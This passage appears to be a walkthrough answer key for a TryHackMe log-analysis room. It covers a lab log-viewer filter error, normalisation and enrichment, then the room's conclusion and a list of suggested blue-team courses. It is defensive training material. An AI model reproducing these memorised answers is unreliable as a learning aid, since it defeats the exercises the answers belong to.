6.1 Upon accessing the log viewer URL for unparsed raw log files, what error does “/var/log/websrv-02/rsyslog_cron.log” show when selecting the different filters? (Question Hint Click on the drop-down button beside “Add filter”.)
Open the Log Viewer using the URL given above:
http://10.10.49.141:8111/log?log=%2Fvar%2Flog%2Fgitlab%2Fnginx%2Faccess.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_cron.log&log=%2Fvar%2Flog%2Fwebsrv-02%2Frsyslog_sshd.log&log=%2Fvar%2Flog%2Fgitlab%2Fgitlab-rails%2Fapi_json.log
The error “No date field” appears in the log viewer’s filter dropdown menu when attempting to filter the logs. It indicates that the log entries do not contain a properly formatted date field that the log viewer tool can recognize for filtering or sorting purposes.
Answer: No date field
6.2 What is the process of standardising parsed data into a more easily readable and query-able format?
Answer: Normalisation
6.3 What is the process of consolidating normalised logs to enhance the analysis of activities related to a specific IP address?
Answer: Enrichment
Task 7 Conclusion
Congratulations! You’ve completed the Intro to Logs room.
In summary, we were able to learn and perform the following:
- The significance of logs as records of past activities, essential for pinpointing and tackling threats.
- Delve into an array of logs, their creation techniques, and the methods of gathering them from diverse systems.
- Review the results from analysing logs in the realms of detection engineering and incident handling.
- Acquire practical skills in identifying and countering adversaries via log analysis.
If you enjoyed this room, continue learning and developing proficiency in areas specific to Security Operations and Incident Response tooling, which may enhance your log analysis and overall Blue Teaming skills, such as the following:
- Endpoint Detection and Response (EDR)
- Intro to Endpoint Security
- Aurora EDR
- Wazuh
- Intrusion Detection and Prevention Systems (IDPS)
- Snort
- Snort Challenge — The Basics
- Snort Challenge — Live Attacks
- Security Information and Event Management (SIEM)
- Investigating with ELK 101
- Splunk: Basics
- Incident handling with Splunk
Recognising that these security tools truly flourish in the hands of skilled individuals with the necessary information and technical expertise to combat potential threats and manage security incidents is vital.
Next Steps
As we conclude, we hope this exploration has instilled in you the importance and potential of logs. Now that you’ve comprehensively understood what logs are, why logging matters and how logging is performed, it’s time to proceed to the next room, Log Operations. May you harness this knowledge to fortify defences, detect adversaries, and drive your cyber security endeavours forward.
Answer the questions below
I’ve completed the Intro to Logs room.